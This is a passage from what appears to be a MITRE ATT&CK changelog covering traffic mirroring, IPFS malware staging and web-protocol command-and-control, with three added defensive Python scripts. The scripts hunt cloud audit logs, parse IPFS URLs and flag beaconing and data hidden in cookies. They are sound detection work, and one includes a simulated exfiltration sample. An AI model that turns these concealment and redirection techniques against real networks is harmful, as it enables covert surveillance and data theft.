(Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.

New Description (remainder):
(Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
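The new description adds cloud traffic mirroring, where the control plane, not a patched device image, is what an adversary has to touch. The defender's check is therefore an audit-log hunt: every mirror session or mirror target that points anywhere other than the sanctioned sensor is a finding. The script below is an added example and is not ATT&CK's or AWS's code. It assumes CloudTrail-style JSON records; the EC2 action names are the real Traffic Mirroring API actions, but the nested requestParameters layout, the account, the resource IDs and the allowlist are constructed for this example.

```python
"""Hunt CloudTrail for traffic-mirror sessions pointed at unsanctioned targets.

Added example for this changelog entry; it is not ATT&CK's or AWS's code.
Assumptions: records follow the CloudTrail JSON layout, the event names are
the EC2 Traffic Mirroring API actions, and the nested requestParameters
layout used in SAMPLE_LOG is constructed for this example.
"""
import json

# Mirror targets the network team actually owns (IDS sensor ENIs, NLBs).
APPROVED_TARGETS = {"tmt-0a1b2c3d4e5f60001"}

# API actions that start a mirror session or add a place packets can be sent.
MIRROR_EVENTS = {
    "CreateTrafficMirrorSession",
    "ModifyTrafficMirrorSession",
    "CreateTrafficMirrorTarget",
}


def _find_key(obj, key):
    """Depth-first search for `key` in nested dicts/lists; None if absent."""
    if isinstance(obj, dict):
        if key in obj:
            return obj[key]
        for value in obj.values():
            hit = _find_key(value, key)
            if hit is not None:
                return hit
    elif isinstance(obj, list):
        for value in obj:
            hit = _find_key(value, key)
            if hit is not None:
                return hit
    return None


def find_unapproved_mirrors(records, approved=APPROVED_TARGETS):
    """Return one finding per mirror session/target that is not sanctioned.

    A CreateTrafficMirrorTarget is always reported: it is a brand-new sink for
    copied packets and should be reviewed before any session uses it.
    """
    findings = []
    for rec in records:
        event = rec.get("eventName")
        if event not in MIRROR_EVENTS:
            continue
        params = rec.get("requestParameters") or {}
        actor = rec.get("userIdentity", {}).get("arn", "unknown")
        if event == "CreateTrafficMirrorTarget":
            sink = (_find_key(params, "NetworkInterfaceId")
                    or _find_key(params, "NetworkLoadBalancerArn"))
            findings.append({"event": event, "actor": actor,
                             "target": sink, "reason": "new mirror target"})
            continue
        target = _find_key(params, "TrafficMirrorTargetId")
        if target not in approved:
            findings.append({"event": event, "actor": actor,
                             "source": _find_key(params, "NetworkInterfaceId"),
                             "target": target, "reason": "unapproved target"})
    return findings


# Constructed sample log: one sanctioned session, one new target, one session
# to an unknown target, one unrelated event.
SAMPLE_LOG = json.loads("""
[
 {"eventName": "CreateTrafficMirrorSession",
  "userIdentity": {"arn": "arn:aws:iam::111111111111:user/netops"},
  "requestParameters": {"CreateTrafficMirrorSessionRequest": {
     "NetworkInterfaceId": "eni-0aaa000000000001",
     "TrafficMirrorTargetId": "tmt-0a1b2c3d4e5f60001",
     "TrafficMirrorFilterId": "tmf-0111111111111111", "SessionNumber": 1}}},
 {"eventName": "CreateTrafficMirrorTarget",
  "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
  "requestParameters": {"CreateTrafficMirrorTargetRequest": {
     "NetworkInterfaceId": "eni-0bbb000000000002"}}},
 {"eventName": "CreateTrafficMirrorSession",
  "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
  "requestParameters": {"CreateTrafficMirrorSessionRequest": {
     "NetworkInterfaceId": "eni-0ccc000000000003",
     "TrafficMirrorTargetId": "tmt-0fffffffffffff999",
     "TrafficMirrorFilterId": "tmf-0222222222222222", "SessionNumber": 1}}},
 {"eventName": "RunInstances",
  "userIdentity": {"arn": "arn:aws:iam::111111111111:user/netops"},
  "requestParameters": {"instanceType": "t3.micro"}}
]
""")

if __name__ == "__main__":
    for finding in find_unapproved_mirrors(SAMPLE_LOG):
        print(finding)
```

The allowlist is deliberately on the target, not the actor: a legitimate operator's credentials are exactly what an access broker sells, so "who created it" is a weaker signal than "where the copied packets go". The same shape of check applies to GCP Packet Mirroring and Azure vTap, with their own audit-log event names and resource identifiers.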

New Mitigations:

Details
dictionary_item_added
  x_mitre_network_requirements: False
  external_references: Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.
dictionary_item_removed
  external_references: CAPEC-117
values_changed
  modified: 2022-04-18 22:16:51.359000+00:00 → 2023-04-14 23:23:30.327000+00:00
  description (old): Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
  description (new): Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
  external_references[1]['source_name']: Cisco Traffic Mirroring → AWS Traffic Mirroring
  external_references[1]['description']: Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020. → Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.
  external_references[1]['url']: https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html → https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html
  external_references[2]['source_name']: Juniper Traffic Mirroring → Cisco Traffic Mirroring
  external_references[2]['description']: Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020. → Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.
  external_references[2]['url']: https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html → https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html
  external_references[3]['source_name']: Cisco Blog Legacy Device Attacks → GCP Packet Mirroring
  external_references[3]['description']: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. → Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.
  external_references[3]['url']: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 → https://cloud.google.com/vpc/docs/packet-mirroring
  external_references[4]['source_name']: US-CERT-TA18-106A → Juniper Traffic Mirroring
  external_references[4]['description']: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. → Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.
  external_references[4]['url']: https://www.us-cert.gov/ncas/alerts/TA18-106A → https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html
  external_references[5]['source_name']: capec → Azure Virtual Network TAP
  external_references[5]['url']: https://capec.mitre.org/data/definitions/117.html → https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview
  x_mitre_attack_spec_version: 2.1.0 → 3.1.0
  x_mitre_data_sources[0]: Network Traffic: Network Traffic Flow → Network Traffic: Network Connection Creation
  x_mitre_data_sources[1]: Network Traffic: Network Connection Creation → Network Traffic: Network Traffic Flow
  x_mitre_version: 1.1 → 1.2
iterable_item_added
  external_references: {'source_name': 'Cisco Blog Legacy Device Attacks', 'description': 'Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.', 'url': 'https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954'}
  external_references: {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
  x_mitre_platforms: IaaS

[T1552] Unsecured Credentials

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

New Detections:

Details
dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_contributors: ['Austin Clark, @c2defense']
  x_mitre_deprecated: False
dictionary_item_removed
  x_mitre_permissions_required: ['User', 'Administrator', 'SYSTEM']
values_changed
  modified: 2022-04-01 13:11:11.386000+00:00 → 2023-04-13 00:29:53.605000+00:00
  x_mitre_data_sources[2]: User Account: User Account Authentication → File: File Access
  x_mitre_data_sources[4]: File: File Access → Application Log: Application Log Content
  x_mitre_version: 1.2 → 1.3
iterable_item_added
  x_mitre_data_sources: User Account: User Account Authentication
  x_mitre_platforms: Network

[T1608.001] Stage Capabilities: Upload Malware

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.

New Description:
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.
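Because content on IPFS cannot be taken down at the source, the practical control shifts to the victim side: recognise IPFS retrievals in proxy and mail-URL logs and block or alert on them. The parser below is an added example, not ATT&CK's or Talos's code. It recognises the common URL shapes (path gateways, subdomain gateways, and native ipfs:// and ipns:// URIs) and validates the CID shape (CIDv0 is base58, "Qm" plus 44 characters; base32 CIDv1 is a "b" followed by the base32 alphabet). The gateway hostnames in the sample are constructed.

```python
"""Pull IPFS content references out of URLs seen in proxy or mail logs.

Added example for this changelog entry, not ATT&CK's or Talos's code. It
recognises the common ways a CID shows up in a URL: path gateways
(https://gateway/ipfs/<cid>/...), subdomain gateways (<cid>.ipfs.gateway),
and ipfs:// / ipns:// URIs. CID shape rules: CIDv0 is base58, "Qm" + 44
chars; base32 CIDv1 is "b" + the base32 alphabet. Gateway hostnames in the
sample URLs are constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# CIDv0: base58btc-encoded sha2-256 multihash, always 46 chars starting "Qm".
_CIDV0 = r"Qm[1-9A-HJ-NP-Za-km-z]{44}"
# CIDv1 in base32 (multibase prefix "b"): lower-case a-z and digits 2-7.
_CIDV1 = r"b[a-z2-7]{50,}"
CID_RE = re.compile(rf"^(?:{_CIDV0}|{_CIDV1})$")

_PATH_RE = re.compile(r"/(ipfs|ipns)/([^/?#]+)")
_SUBDOMAIN_RE = re.compile(r"^([^.]+)\.(ipfs|ipns)\.")


def is_cid(token):
    """True if `token` has the shape of a CIDv0 or a base32 CIDv1."""
    return bool(CID_RE.match(token))


def extract_ipfs(url):
    """Return (kind, name, gateway) for an IPFS reference in `url`, else None.

    kind is "ipfs" or "ipns"; name is the CID (or IPNS name); gateway is the
    host that served it, or "" for a native ipfs:// or ipns:// URI.
    """
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme in ("ipfs", "ipns"):
        name = parts.netloc or parts.path.strip("/").split("/")[0]
        return (scheme, name, "")
    host = parts.hostname or ""
    m = _SUBDOMAIN_RE.match(host)
    if m:
        # Subdomain gateway: left-most label is the CID, the rest is the gateway.
        return (m.group(2), m.group(1), host[m.end():])
    m = _PATH_RE.search(unquote(parts.path))
    if m:
        return (m.group(1), m.group(2), host)
    return None


def ipfs_findings(urls):
    """One record per URL that carries an IPFS reference, with CID validity."""
    out = []
    for url in urls:
        ref = extract_ipfs(url)
        if ref is None:
            continue
        kind, name, gateway = ref
        out.append({"url": url, "kind": kind, "name": name, "gateway": gateway,
                    "cid_valid": kind == "ipfs" and is_cid(name)})
    return out


# Constructed sample: two gateway fetches, one native URI, one ordinary site
# with a misleading /ipfs/ path, one unrelated URL.
SAMPLE_URLS = [
    "https://gateway.example/ipfs/QmYwAPJzv5CZsnA625s3Xf2nemtYgPpHdWEz79ojWnPbdG/invoice.html",
    "https://bafybeigdyrzt5sfp7udm7hu76uh7y26nf3efuylqabf3oclgtqy55fbzdi.ipfs.dweb.example/",
    "ipfs://QmYwAPJzv5CZsnA625s3Xf2nemtYgPpHdWEz79ojWnPbdG",
    "https://www.example.com/ipfs/not-a-cid",
    "https://www.example.com/static/app.js",
]

if __name__ == "__main__":
    for finding in ipfs_findings(SAMPLE_URLS):
        print(finding)
```

Matching on the CID rather than on a list of gateway hostnames is the point: public gateways come and go, and an attacker can stand up a private one, but the content address is what the phishing page or loader has to carry.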
Details
dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False
values_changed
  modified: 2021-10-17 16:24:48.949000+00:00 → 2023-04-11 23:22:49.534000+00:00
  description (old): Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.
  description (new): Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.
  x_mitre_version: 1.1 → 1.2
iterable_item_added
  external_references: {'source_name': 'Talos IPFS 2022', 'description': 'Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.', 'url': 'https://blog.talosintelligence.com/ipfs-abuse/'}
  x_mitre_contributors: Goldstein Menachem

[T1078] Valid Accounts

Current version: 2.6

Version changed from: 2.5 → 2.6

New Mitigations:

Dropped Mitigations:

Details
values_changed
  modified: 2022-10-19 19:57:39.849000+00:00 → 2023-03-30 21:01:51.631000+00:00
  x_mitre_attack_spec_version: 2.1.0 → 3.1.0
  x_mitre_version: 2.5 → 2.6
iterable_item_added
  x_mitre_contributors: Goldstein Menachem
  x_mitre_data_sources: User Account: User Account Authentication
iterable_item_removed
  external_references: {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/560.html', 'external_id': 'CAPEC-560'}
  x_mitre_data_sources: User Account: User Account Authentication

[T1059.005] Command and Scripting Interpreter: Visual Basic

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False
  x_mitre_remote_support: False
dictionary_item_removed
  x_mitre_permissions_required: ['User', 'Administrator', 'SYSTEM']
values_changed
  modified: 2022-03-07 19:43:49.315000+00:00 → 2023-04-07 17:13:03.738000+00:00
  external_references[2]['source_name']: VB Microsoft → Default VBS macros Blocking
  external_references[2]['description']: Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020. → Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.
  external_references[2]['url']: https://docs.microsoft.com/dotnet/visual-basic/ → https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
  external_references[3]['source_name']: Microsoft VBA → Microsoft VBScript
  external_references[3]['description']: Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020. → Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.
  external_references[3]['url']: https://docs.microsoft.com/office/vba/api/overview/ → https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)
  external_references[4]['source_name']: Wikipedia VBA → Microsoft VBA
  external_references[4]['description']: Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020. → Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.
  external_references[4]['url']: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications → https://docs.microsoft.com/office/vba/api/overview/
  external_references[5]['source_name']: Microsoft VBScript → VB Microsoft
  external_references[5]['description']: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020. → Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.
  external_references[5]['url']: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85) → https://docs.microsoft.com/dotnet/visual-basic/
  external_references[6]['source_name']: Default VBS macros Blocking → Wikipedia VBA
  external_references[6]['description']: Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022. → Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.
  external_references[6]['url']: https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805 → https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
  x_mitre_data_sources[0]: Process: Process Creation → Module: Module Load
  x_mitre_data_sources[1]: Module: Module Load → Command: Command Execution
  x_mitre_data_sources[2]: Script: Script Execution → Process: Process Creation
  x_mitre_data_sources[3]: Command: Command Execution → Script: Script Execution
  x_mitre_version: 1.3 → 1.4

[T1071.001] Application Layer Protocol: Web Protocols

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

New Description:
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
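The description gives the two things a defender can key on without decrypting anything: the traffic is machine-timed (a beacon checks in on a schedule, people do not), and the "fields and headers in which data can be concealed" are still visible to a proxy that terminates TLS. The script below is an added example, not ATT&CK's code, that runs both checks plus a WebSocket-upgrade allowlist over proxy logs. It assumes a proxy that writes one JSON object per request with the fields used in SAMPLE_LOG (epoch timestamp, client IP, destination host, the Cookie header and, for upgraded connections, the Upgrade value); the hosts, addresses, thresholds and cookie contents are constructed.

```python
"""Two checks over web-proxy logs for C2 that hides in HTTP/S or WebSocket.

Added example for this changelog entry, not ATT&CK's code. It assumes a
proxy that writes one JSON object per request with the fields used in
SAMPLE_LOG (epoch timestamp, client IP, destination host, the Cookie header
and, for upgraded connections, the Upgrade value); hosts, addresses,
thresholds and cookie contents are constructed.
"""
import base64
import json
import re
import statistics
from collections import defaultdict

# Hosts where a WebSocket upgrade is expected (chat and collaboration tools).
WEBSOCKET_ALLOWLIST = {"chat.corp.example"}
# A (client, host) pair needs at least this many requests before timing is scored.
MIN_REQUESTS = 5
# Coefficient of variation of the gaps below this looks timer-driven, not human.
MAX_JITTER = 0.15
# A base64-looking run this long inside Cookie is far bigger than a session id.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def parse_log(lines):
    """One dict per non-empty JSON line."""
    return [json.loads(line) for line in lines if line.strip()]


def beaconing_pairs(events):
    """(client, host) pairs whose inter-request gaps are near-constant."""
    times = defaultdict(list)
    for ev in events:
        times[(ev["client"], ev["host"])].append(ev["ts"])
    hits = []
    for (client, host), ts in times.items():
        if len(ts) < MIN_REQUESTS:
            continue
        ts.sort()
        gaps = [later - earlier for earlier, later in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean < MAX_JITTER:
            hits.append({"check": "beacon", "client": client, "host": host,
                         "period_s": round(mean, 1)})
    return hits


def suspicious_requests(events):
    """Per-request checks: oversized blob in Cookie, WebSocket to an odd host."""
    hits, blob_seen = [], set()
    for ev in events:
        pair = (ev["client"], ev["host"])
        if BLOB_RE.search(ev.get("cookie", "")) and pair not in blob_seen:
            blob_seen.add(pair)  # report a chatty pair once, not per request
            hits.append({"check": "cookie_blob", "client": pair[0],
                         "host": pair[1], "cookie_bytes": len(ev["cookie"])})
        if ev.get("upgrade") == "websocket" and ev["host"] not in WEBSOCKET_ALLOWLIST:
            hits.append({"check": "websocket", "client": pair[0], "host": pair[1]})
    return hits


def analyse(lines):
    events = parse_log(lines)
    return beaconing_pairs(events) + suspicious_requests(events)


def _line(ts, client, host, cookie="sid=4f1c9e2a7b3d4e5f6a7b8c9d0e1f2a3b", upgrade=None):
    rec = {"ts": ts, "client": client, "host": host, "cookie": cookie}
    if upgrade:
        rec["upgrade"] = upgrade
    return json.dumps(rec)


# Constructed sample: one host polled every ~60 s with a base64 blob riding in
# the cookie, some ordinary browsing, and two WebSocket upgrades (one allowed).
BLOB_COOKIE = "sid=" + base64.b64encode(b"host=ws01;user=alice;domain=corp;chunk=001;" * 2).decode()
SAMPLE_LOG = [
    _line(ts, "10.0.0.5", "cdn.example-update.net", cookie=BLOB_COOKIE)
    for ts in (1000, 1059, 1120, 1180, 1240, 1299)
] + [
    _line(1003, "10.0.0.7", "www.example.com"),
    _line(1407, "10.0.0.7", "www.example.com"),
    _line(1412, "10.0.0.7", "www.example.com"),
    _line(1100, "10.0.0.5", "ws.example-update.net", upgrade="websocket"),
    _line(1105, "10.0.0.7", "chat.corp.example", upgrade="websocket"),
]

if __name__ == "__main__":
    for hit in analyse(SAMPLE_LOG):
        print(hit)
```

The jitter threshold is the knob to tune: real implants add randomised sleep, so in production you would score the distribution of gaps (or run this over a longer window) rather than rely on one coefficient, and you would feed the cookie-blob check from whatever header your proxy actually logs.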
Details
dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_contributors: ['TruKno']
  x_mitre_deprecated: False
values_changed
  modified: 2020-03-26 20:15:35.821000+00:00 → 2023-04-11 15:21:27.965000+00:00
  description (old): Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
  description (new): Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
  external_references[1]['source_name']: University of Birmingham C2 → CrowdStrike Putter Panda
  external_references[1]['description']: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. → Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
  external_references[1]['url']: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf → http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf
  x_mitre_data_sources[0]: Network Traffic: Network Traffic Flow → Network Traffic: Network Traffic Content
  x_mitre_data_sources[1]: Network Traffic: Network Traffic Content → Network Traffic: Network Traffic Flow
  x_mitre_version: 1.0 → 1.1
iterable_item_added
